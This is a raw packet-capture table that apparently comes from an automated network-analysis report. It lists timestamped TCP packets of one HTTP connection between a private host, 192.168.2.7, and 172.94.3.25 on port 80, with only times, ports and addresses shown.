Sep 25, 2024 18:33:53.414679050 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.414711952 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.414732933 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.414743900 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.414779902 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.414805889 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.414812088 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.414845943 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.414876938 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.414879084 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.414911032 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.414949894 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.414963961 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.415055037 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.415329933 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.415363073 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.415420055 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.415443897 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.415477037 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.415510893 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.415550947 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.415551901 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.415585041 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.415616989 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.415626049 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.415651083 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.415678978 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.415990114 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.416023970 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.416058064 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.416095018 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.416129112 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.416161060 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.416193962 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.416194916 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.416194916 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.416227102 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.416259050 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.416260958 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.416290045 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.416322947 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.416335106 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.416356087 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.416388988 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.416414976 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.416521072 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.416781902 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.416834116 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.416867018 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.416898966 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.416914940 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.416935921 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.416956902 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.416969061 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.417001963 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.417036057 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.417058945 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.417068005 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.417100906 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.417114019 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.417134047 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.417166948 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.417190075 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.417200089 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.417217970 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.417233944 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.417294979 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.417663097 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.417725086 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.417768002 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.417824030 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.417857885 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.417872906 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.417891026 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.417924881 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.417937040 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.417958021 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.417992115 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.417995930 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.418025017 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.418056965 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.418057919 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.418087959 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.418088913 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.418118954 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.418122053 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.418128014 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.418716908 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.418751001 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.418771029 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.418785095 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.418818951 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.418833017 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.418857098 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.418890953 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.418921947 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.418941021 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.418956041 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.418992043 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.419006109 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.419025898 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.419059038 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.419091940 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.419097900 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.419097900 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.419125080 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.419225931 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.419481993 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.419518948 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.419718027 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.427740097 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.484955072 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.484981060 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.485002041 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.485028982 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.485044003 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.485059023 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.485075951 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.485105038 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.485222101 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.485408068 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.485490084 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.485502958 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.485527039 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.485585928 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.485604048 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.485615969 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.485630989 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.485646963 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.485660076 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.485661983 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.485677004 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.485691071 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.485702038 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.485781908 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.503731012 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.503751040 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.503772020 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.503814936 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.503829956 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.503849030 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.503938913 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.503941059 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.503956079 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.503972054 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.503987074 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.504005909 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.504017115 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.504139900 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.504154921 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.504168987 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.504271984 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.504303932 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.504303932 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.504347086 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.504362106 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.504385948 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.504400969 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.504415035 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.504436016 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.504467010 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.504715919 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.504729986 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.504745007 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.504760027 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.504771948 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.504775047 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.504928112 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.505080938 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.505095005 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.505111933 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.505127907 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.505142927 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.505142927 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.505158901 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.505175114 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.505196095 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.505199909 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.505199909 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.505439997 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.505548000 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.505563974 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.505579948 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.505606890 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.505774975 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.505789042 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.505804062 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.505817890 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.505832911 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.505847931 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.505855083 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.505855083 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.505862951 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.505877018 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.505894899 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.505897999 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.505897999 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.505916119 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.505924940 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.505932093 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.506010056 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.506577969 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.506592989 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.506608009 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.506623030 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.506638050 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.506650925 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.506659031 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.506674051 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.506689072 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.506694078 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.506694078 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.506705046 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.506720066 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.506736040 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.506738901 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.506752014 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.506767035 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.506779909 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.506791115 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.506791115 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.506817102 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.507476091 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.507492065 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.507505894 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.507522106 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.507535934 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.507550001 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.507554054 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.507564068 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.507580996 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.507580996 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.507581949 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.507596016 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.507611036 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.507623911 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.507637978 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.507639885 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.507639885 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.507652998 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.507719040 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.508306980 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.508322001 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.508336067 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.508351088 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.508367062 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.508383036 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.508383989 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.508398056 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.508415937 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.508430958 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.508430958 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.508447886 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.508465052 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.508466959 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.508466959 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.508480072 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.508493900 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.508533001 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.508533001 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.509226084 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.509242058 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.509255886 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.509272099 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.509287119 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.509304047 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.509309053 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.509309053 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.509319067 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.509335995 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.509351015 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.509365082 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.509373903 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.509375095 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.509381056 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.509397984 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.509413004 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.509429932 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.509433985 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.509433985 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.509586096 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.575602055 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.575623989 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.575640917 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.575721979 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.575737000 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.575753927 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.575766087 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.575766087 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.575768948 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.575783968 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.575829029 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.575829029 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.576020002 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.576035023 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.576050997 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.576071024 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.576087952 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.576102972 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.576145887 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.576267958 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.576282024 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.576303959 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.576332092 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.576420069 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.594438076 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.594470978 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.594485044 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.594614029 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.594628096 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.594644070 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.594646931 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.594660997 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.594722033 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.594722033 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.594892025 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.594907999 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.594923019 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.594938040 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.594939947 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.594955921 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.594968081 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.594968081 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.595072031 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.595237017 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.595257044 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.595272064 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.595287085 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.595293999 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.595303059 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.595319033 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.595320940 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.595406055 CEST	49699	80	192.168.2.7	172.94.3.25
